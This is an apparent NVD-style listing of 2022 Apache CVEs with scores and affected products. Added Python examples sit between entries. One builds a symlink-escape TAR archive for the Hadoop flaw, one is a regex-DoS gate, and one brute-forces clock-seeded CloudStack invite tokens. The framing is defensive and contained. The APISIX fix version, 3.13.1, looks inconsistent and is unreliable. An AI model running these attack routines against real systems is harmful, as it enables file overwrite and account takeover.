Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache apisix *
CVE-2022-25762 HIGH

If a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently, which could result in data being returned to the wrong user and/or other errors.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L 3.9 4.7

CVSS 2.0

Severity: HIGH

Problem Type: CWE-404,

Products Affected

Vendor Product Version
apache tomcat *
oracle agile_plm 9.3.6
CVE-2022-25763

Improper Input Validation vulnerability in HTTP/2 request validation of Apache Traffic Server allows an attacker to perform request smuggling or cache poisoning attacks. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
apache traffic_server *
debian debian_linux 11.0
CVE-2022-25813

In Apache OFBiz, versions 18.12.05 and earlier, an attacker acting as an anonymous user of the ecommerce plugin can insert malicious content in the message “Subject” field of the "Contact us" page. When a party manager then lists the communications in the party component, the server-side template injection (SSTI) is triggered and RCE is possible.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-26112

In Apache Pinot 0.10.0 and older, the Pinot query endpoint and realtime ingestion layer are vulnerable in unprotected environments because of Groovy function support. To avoid this, Groovy function support is disabled by default from Pinot release 0.11.0. See https://docs.pinot.apache.org/basics/releases/0.11.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pinot *
CVE-2022-26336 MEDIUM

A shortcoming in the HMEF package of poi-scratchpad (Apache POI) allows an attacker to cause an Out of Memory exception. This package is used to read TNEF files (Microsoft Outlook and Microsoft Exchange Server). If an application uses poi-scratchpad to parse TNEF files and the application allows untrusted users to supply them, then a carefully crafted file can cause an Out of Memory exception. This issue affects poi-scratchpad version 5.2.0 and prior versions. Users are recommended to upgrade to poi-scratchpad 5.2.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-770,

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache poi *
CVE-2022-26377 MEDIUM

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server 2.4 version 2.4.53 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-26477 MEDIUM

The Security Team noticed that the termination condition of the for loop in the readExternal method is a controllable variable, which, if tampered with, may lead to CPU exhaustion. As a fix, we added an upper bound and termination condition in the read and write logic. We classify it as a "low-priority but useful improvement". SystemDS is a distributed system and needs to serialize/deserialize data but in many code paths (e.g., on Spark broadcast/shuffle or writing to sequence files) the byte stream is anyway protected by additional CRC fingerprints. In this particular case though, the number of decoders is upper-bounded by twice the number of columns, which means an attacker would need to modify two entries in the byte stream in a consistent manner. By adding these checks robustness was strictly improved with almost zero overhead. These code changes are available in versions higher than 2.2.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache systemds *
CVE-2022-26612 HIGH

In Apache Hadoop, the unTar function uses the unTarUsingJava function on Windows and the built-in tar utility on Unix and other OSes. As a result, a TAR entry may create a symlink under the expected extraction directory which points to an external directory. A subsequent TAR entry may then extract an arbitrary file into the external directory using the symlink name. On Unix this is caught by the targetDirPath check because of the getCanonicalPath call; on Windows, however, getCanonicalPath does not resolve symbolic links, which bypasses the check. unpackEntries during TAR extraction follows symbolic links, which allows writing outside the expected base directory on Windows. This was addressed in Apache Hadoop 3.2.3.
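The two-entry attack above, as an added example that is not Hadoop code: the archive, entry names and temporary directories are constructed for illustration, and `extract()` is a minimal extractor whose containment check can be switched between lexical normalisation (`os.path.normpath`, behaving like getCanonicalPath on Windows, which does not resolve symlinks) and real resolution (`os.path.realpath`, which follows the symlink an earlier entry created). It also rejects symlink entries whose target lies outside the destination, which would have stopped the first entry on its own. Creating symlinks needs a Unix-like host or symlink privilege on Windows.

```python
"""Symlink escape during TAR extraction (CVE-2022-26612) and the check that stops it.

Added example, not Hadoop code. The archive, the entry names and the temporary
directories are constructed for illustration. extract() is a minimal extractor in
which the containment check can be switched between lexical normalisation
(os.path.normpath, like getCanonicalPath on Windows, which does not resolve
symlinks) and real resolution (os.path.realpath, which follows the symlink an
earlier entry created)."""
import io
import os
import tarfile
import tempfile
from typing import List, Optional, Tuple


class PathEscape(Exception):
    def __init__(self, entry: str) -> None:
        super().__init__(f"entry escapes extraction directory: {entry}")
        self.entry = entry


def build_malicious_tar(outside_dir: str) -> bytes:
    """Two entries: a symlink named 'link' pointing outside, then a regular file
    whose path goes through that symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("link")
        link.type = tarfile.SYMTYPE
        link.linkname = outside_dir
        tar.addfile(link)
        payload = b"written outside the extraction directory\n"
        evil = tarfile.TarInfo("link/evil.txt")
        evil.size = len(payload)
        tar.addfile(evil, io.BytesIO(payload))
    return buf.getvalue()


def extract(archive: bytes, dest: str, resolve_symlinks: bool) -> List[str]:
    """Extract `archive` under `dest`, rejecting any entry that would land outside."""
    base = os.path.realpath(dest)
    canon = os.path.realpath if resolve_symlinks else os.path.normpath
    written: List[str] = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for member in tar:
            path = os.path.join(base, member.name)
            # Entries are processed in order, so with realpath a symlink created
            # by an earlier entry is resolved here; normpath never sees it.
            if os.path.commonpath([base, canon(path)]) != base:
                raise PathEscape(member.name)
            if member.issym():
                if resolve_symlinks:
                    target = os.path.realpath(os.path.join(os.path.dirname(path), member.linkname))
                    if os.path.commonpath([base, target]) != base:
                        raise PathEscape(member.name)
                os.symlink(member.linkname, path)
            elif member.isdir():
                os.makedirs(path, exist_ok=True)
            elif member.isfile():
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "wb") as fh:
                    fh.write(tar.extractfile(member).read())
            else:
                raise ValueError(f"unsupported entry type: {member.name}")
            written.append(path)
    return written


def demo(resolve_symlinks: bool) -> Tuple[bool, Optional[str]]:
    """Run the malicious archive through extract().
    Returns (a file landed outside dest, name of the rejected entry or None)."""
    with tempfile.TemporaryDirectory() as tmp:
        outside = os.path.join(tmp, "outside")
        dest = os.path.join(tmp, "dest")
        os.mkdir(outside)
        os.mkdir(dest)
        rejected = None
        try:
            extract(build_malicious_tar(outside), dest, resolve_symlinks)
        except PathEscape as exc:
            rejected = exc.entry
        return os.path.exists(os.path.join(outside, "evil.txt")), rejected


if __name__ == "__main__":
    print("lexical check :", demo(resolve_symlinks=False))   # (True, None)
    print("resolved check:", demo(resolve_symlinks=True))    # (False, 'link')
```

With the lexical check the file lands in `outside/`, because the second entry's path is inside the destination as text but not on disk; with real resolution the symlink entry itself is refused. Hard links need the same treatment as symlinks, and the check must run per entry after the previous entries have been written, not once over the member list up front.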

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache hadoop 3.3.2
apache hadoop 3.3.1
apache hadoop *
CVE-2022-26650 MEDIUM

In Apache ShenYu, ShenYu-Bootstrap's RegexPredicateJudge.java uses Pattern.matches(conditionData.getParamValue(), realData) to make judgments, where both parameters are controllable by the user. This allows an attacker to pass in malicious regular expressions and input strings, causing resource exhaustion. This issue affects Apache ShenYu (incubating) 2.4.0, 2.4.1 and 2.4.2 and is fixed in 2.4.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1333,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
apache shenyu 2.4.2
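A hardened version of the predicate the ShenYu entry describes, as an added example that is not ShenYu's code. The dangerous part is letting a user supply the pattern; the gate below parses the candidate pattern with Python's own regex parser and refuses nested unbounded repeats (the (a+)+ shape behind catastrophic backtracking), caps pattern and input length, and only then performs the full match that Pattern.matches() does. The same nested-quantifier shape underlies the ReDoS entries for OFBiz, Tapestry and Tika further down; those are developer-written patterns over user input, where the length cap is the relevant guard. The size limits are assumptions.

```python
import re

try:                      # Python 3.11+ moved the parser module
    from re import _parser as sre_parse
except ImportError:       # older interpreters
    import sre_parse

MAX_PATTERN_LEN = 256     # assumed limits for the demonstration
MAX_INPUT_LEN = 4096


def _nested_unbounded(seq, depth=0) -> bool:
    """True if an unbounded repeat (*, +, {n,}) sits inside another one."""
    for op, av in seq:
        if op in (sre_parse.MAX_REPEAT, sre_parse.MIN_REPEAT):
            _lo, hi, sub = av
            if hi == sre_parse.MAXREPEAT:
                if depth >= 1:
                    return True
                if _nested_unbounded(sub, depth + 1):
                    return True
            elif _nested_unbounded(sub, depth):
                return True
        elif op == sre_parse.SUBPATTERN:                      # (...) group
            if _nested_unbounded(av[-1], depth):
                return True
        elif op == sre_parse.BRANCH:                          # a|b
            if any(_nested_unbounded(alt, depth) for alt in av[1]):
                return True
        elif op in (sre_parse.ASSERT, sre_parse.ASSERT_NOT):  # lookaround
            if _nested_unbounded(av[1], depth):
                return True
    return False


def is_safe_pattern(pattern: str) -> bool:
    """Static gate for a user-supplied pattern: must parse, stay short and
    contain no nested unbounded repeats. This is a heuristic: overlapping
    alternation such as (a|aa)+ is not caught, so the length caps still matter."""
    if len(pattern) > MAX_PATTERN_LEN:
        return False
    try:
        tree = sre_parse.parse(pattern)
    except re.error:
        return False
    return not _nested_unbounded(tree)


def regex_judge(user_pattern: str, real_data: str) -> bool:
    """ShenYu-style predicate, hardened: full match of real_data against the
    rule's pattern, but only if pattern and input pass the gates. A failed
    gate is reported as 'no match' instead of a stalled worker thread."""
    if len(real_data) > MAX_INPUT_LEN or not is_safe_pattern(user_pattern):
        return False
    return re.fullmatch(user_pattern, real_data) is not None
```

Where user-supplied patterns are unavoidable, a linear-time engine (RE2-style) is the stronger answer; the static gate here is what you can do with the standard library.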
CVE-2022-26779 MEDIUM

Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite. This feature is not enabled by default, the attacker is required to know or guess the project ID for the invite in addition to the invitation token, and the attacker would need to be an existing authorized user of CloudStack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-338,

Products Affected

Vendor Product Version
apache cloudstack *
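What "time deterministic tokens" buys an attacker, as an added example that is not CloudStack's code. A token derived from a clock-seeded PRNG can be regenerated for every instant in the window during which the invite was sent, so an attacker who knows the project ID and roughly when the invite went out can try each candidate against the accept endpoint before the recipient does. The CSPRNG variant has no such structure. Token format, window size and timestamps are assumptions.

```python
import hmac
import random
import secrets


def weak_invite_token(sent_at_ms: int) -> str:
    """Insecure: a PRNG seeded from the wall clock. Anyone who knows roughly
    when the invite was sent can regenerate every candidate token offline."""
    rng = random.Random(sent_at_ms)
    return "%032x" % rng.getrandbits(128)


def strong_invite_token() -> str:
    """CSPRNG output: 128 bits from the OS entropy source, unrelated to time."""
    return secrets.token_hex(16)


def accept_invite(stored: str, presented: str) -> bool:
    """Server side: constant-time comparison so the check itself leaks nothing."""
    return hmac.compare_digest(stored, presented)


def brute_force(stored: str, approx_ms: int, window_ms: int):
    """Attacker side: submit every token the clock window could have produced.
    Returns the attempt number that succeeded, or None if none did."""
    attempts = 0
    for t in range(approx_ms - window_ms, approx_ms + window_ms + 1):
        attempts += 1
        if accept_invite(stored, weak_invite_token(t)):
            return attempts
    return None


if __name__ == "__main__":
    sent = 1_650_000_000_000                      # assumed send time (ms)
    print("weak  :", brute_force(weak_invite_token(sent), sent + 1500, 2000))
    print("strong:", brute_force(strong_invite_token(), sent + 1500, 2000))
```

Rate limiting and single-use, short-lived invites narrow the window further, but they do not substitute for an unpredictable token.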
CVE-2022-26850 MEDIUM

When creating or updating credentials for single-user access, Apache NiFi wrote a copy of the Login Identity Providers configuration to the operating system temporary directory. On most platforms, the operating system temporary directory has global read permissions. NiFi immediately moved the temporary file to the final configuration directory, which significantly limited the window of opportunity for access. NiFi 1.16.0 includes updates to replace the Login Identity Providers configuration without writing a file to the operating system temporary directory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
apache nifi *
CVE-2022-26884

Users can read arbitrary files via the log server. Apache DolphinScheduler users should upgrade to version 2.0.6 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-26885

When using tasks to read config files, there is a risk of database password disclosure. We recommend you upgrade to version 2.0.6 or higher.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-27166

A carefully crafted request on XHRHtml2Markup.jsp could trigger an XSS vulnerability on Apache JSPWiki up to and including 2.11.2, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-27479 HIGH

Apache Superset before 1.4.2 is vulnerable to SQL injection in chart data requests. Users should update to 1.4.2 or higher which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache superset *
CVE-2022-27949

A vulnerability in UI of Apache Airflow allows an attacker to view unmasked secrets in rendered template values for tasks which were not executed (for example when they were depending on past and previous instances of the task failed). This issue affects Apache Airflow prior to 2.3.1.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-28129

Improper Input Validation vulnerability in HTTP/1.1 header parsing of Apache Traffic Server allows an attacker to send invalid headers. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2022-28220

Apache James prior to releases 3.6.3 and 3.7.1 is vulnerable to a buffering attack relying on the use of the STARTTLS command. The fix for CVE-2021-38542, which solved a similar problem from Apache James 3.6.1, is subject to a parser differential and does not take concurrent requests into account.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache james 3.7.0
apache james *
CVE-2022-28330 MEDIUM

Apache HTTP Server 2.4.53 and earlier on Windows may read beyond bounds when configured to process requests with the mod_isapi module.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache http_server *
CVE-2022-28331

On Windows, Apache Portable Runtime 1.7.0 and earlier may write beyond the end of a stack based buffer in apr_socket_sendv(). This is a result of integer overflow.

Products Affected

Vendor Product Version
apache portable_runtime *
CVE-2022-28614 MEDIUM

The ap_rwrite() function in Apache HTTP Server 2.4.53 and earlier may read unintended memory if an attacker can cause the server to reflect very large input using ap_rwrite() or ap_rputs(), such as with mod_lua's r:puts() function. Modules compiled and distributed separately from Apache HTTP Server that use the 'ap_rputs' function and may pass it a very large (INT_MAX or larger) string must be compiled against current headers to resolve the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-190,CWE-200,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-28615 MEDIUM

Apache HTTP Server 2.4.53 and earlier may crash or disclose information due to a read beyond bounds in ap_strcmp_match() when provided with an extremely large input buffer. While no code distributed with the server can be coerced into such a call, third-party modules or lua scripts that use ap_strcmp_match() may hypothetically be affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-190,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-28730

A carefully crafted request on AJAXPreview.jsp could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. This vulnerability leverages CVE-2021-40369, where the Denounce plugin dangerously renders user-supplied URLs. Upon re-testing CVE-2021-40369, it appears that the patch was incomplete as it was still possible to insert malicious input via the Denounce plugin. Apache JSPWiki users should upgrade to 2.11.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-28731

A carefully crafted request on UserPreferences.jsp could trigger a CSRF vulnerability on Apache JSPWiki before 2.11.3, which could allow the attacker to modify the email associated with the attacked account and then issue a password reset request from the login page.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-28732

A carefully crafted request on WeblogPlugin could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.3 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-28889 MEDIUM

In Apache Druid 0.22.1 and earlier, the server did not set appropriate headers to prevent clickjacking. Druid 0.23.0 and later prevent clickjacking using the Content-Security-Policy header.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1021,

Products Affected

Vendor Product Version
apache druid *
CVE-2022-28890 HIGH

A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache jena 4.4.0
CVE-2022-29063

The Solr plugin of Apache OFBiz is configured by default to automatically make a RMI request on localhost, port 1099. In version 18.12.05 and earlier, by hosting a malicious RMI server on localhost, an attacker may exploit this behavior, at server start-up or on a server restart, in order to run arbitrary code. Upgrade to at least 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12646.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-29158

Apache OFBiz up to version 18.12.05 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles URLs provided by external, unauthenticated users. Upgrade to 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12599

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-29265 MEDIUM

Multiple components in Apache NiFi 0.0.1 to 1.16.0 do not restrict XML External Entity references in the default configuration. The Standard Content Viewer service attempts to resolve XML External Entity references when viewing formatted XML files. The following Processors attempt to resolve XML External Entity references when configured with default property values:
- EvaluateXPath
- EvaluateXQuery
- ValidateXml
Apache NiFi flow configurations that include these Processors are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolution disables Document Type Declarations in the default configuration for these Processors, and disallows XML External Entity resolution in standard services.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2022-29266 MEDIUM

In Apache APISIX before 3.13.1, the jwt-auth plugin has a security issue that leaks the user's secret key because the error message returned from the dependency lua-resty-jwt contains sensitive information.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-209,

Products Affected

Vendor Product Version
apache apisix *
CVE-2022-29404 MEDIUM

In Apache HTTP Server 2.4.53 and earlier, a malicious request to a lua script that calls r:parsebody(0) may cause a denial of service due to no default limit on possible input size.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-29405 MEDIUM

In Apache Archiva, any registered user can reset the password of any other user. This is fixed in Archiva 2.2.8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache archiva *
CVE-2022-29599 HIGH

In Apache Maven maven-shared-utils prior to version 3.3.3, the Commandline class can emit double-quoted strings without proper escaping, allowing shell injection attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-116,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache maven_shared_utils *
debian debian_linux 11.0
CVE-2022-29885 MEDIUM

The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
oracle hospitality_cruise_shipboard_property_management_system 20.2.1
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-30126 MEDIUM

In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.2 and 2.4.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 19.12
oracle primavera_unifier 21.12
apache tika *
oracle primavera_unifier *
oracle primavera_unifier 18.8
CVE-2022-30522 MEDIUM

If Apache HTTP Server 2.4.53 is configured to do transformations with mod_sed in contexts where the input to mod_sed may be very large, mod_sed may make excessively large memory allocations and trigger an abort.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-789,CWE-770,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server 2.4.53
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-30556 MEDIUM

Apache HTTP Server 2.4.53 and earlier may return lengths to applications calling r:wsread() that point past the end of the storage allocated for the buffer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-30973 LOW

We failed to apply the fix for CVE-2022-30126 to the 1.x branch in the 1.28.2 release. In Apache Tika, a regular expression in the StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tika *
CVE-2022-31764

The Lite UI of Apache ShardingSphere ElasticJob-UI allows an attacker to perform RCE by constructing a special JDBC URL of H2 database. This issue affects Apache ShardingSphere ElasticJob-UI version 3.0.1 and prior versions. This vulnerability has been fixed in ElasticJob-UI 3.0.2. The premise of this attack is that the attacker has obtained the account and password. Otherwise, the attacker cannot perform this attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache shardingsphere_elasticjob-ui *
CVE-2022-31777

